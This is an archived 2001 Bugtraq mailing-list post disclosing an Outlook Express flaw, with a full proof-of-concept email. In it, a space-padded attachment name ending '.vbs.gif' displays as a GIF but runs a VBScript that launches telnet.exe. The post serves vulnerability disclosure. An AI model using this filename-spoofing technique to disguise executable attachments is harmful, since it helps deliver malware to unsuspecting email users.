Email email text or death

From: Tom Whore (tomwhore@inetarena.com)
Date: Fri Jan 19 2001 - 09:22:24 PST


---------- Forwarded message ----------
Date: Fri, 19 Jan 2001 09:19:45 -0000
From: Shane Hird <s.hird@STUDENT.QUT.EDU.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: HTML.dropper

Hi,

With some testing, I've found that the 'subject-
overflow' problem is irrelevant to the 'filename
overflow' problem, although as mentioned, this may
help to overcome some email filters/scanners.

It seems OE is cutting the file name short to a
specified length when trying to open it (consequently
chopping off the real extension), but not cutting it
short when determining which icon to use. (Note that
the icon choice doesn't seem to be affected like this
with the subject overflow problem.)

The following is an example which will produce
a 'normal' email, with a standard attachment,
however the 'filename' of the attachement is four
characters too long, which just happens to be
the '.gif' which gets chopped off, leaving just '.vbs'.

The filename displayed for the attachment will
be 'nicepic.gif', followed by a lot of spaces which
obviously aren't seen. Adjust the filename size as
necessary for the client in question. I predict a new
breed of i-worm to be using this technique in a short
while.

<snip email.eml>

To: "anyone@home.com"
Subject:anything
Date: Fri, 19 Jan 2001 18:44:39 +1000
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----
=_NextPart_000_000B_01C08247.E5DF4F00"

------=_NextPart_000_000B_01C08247.E5DF4F00
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
        filename="nicepic.gif
                                                                                       
                                                                                       
                                .vbs.gif"

set WshShell = WScript.CreateObject
("WScript.Shell")
WshShell.Run("telnet.exe")

------=_NextPart_000_000B_01C08247.E5DF4F00

</snip>

I apologise if this is already known, however I felt it
should be clarified for this thread.

-Shane



This archive was generated by hypermail 2b29 : Fri Apr 27 2001 - 23:18:54 PDT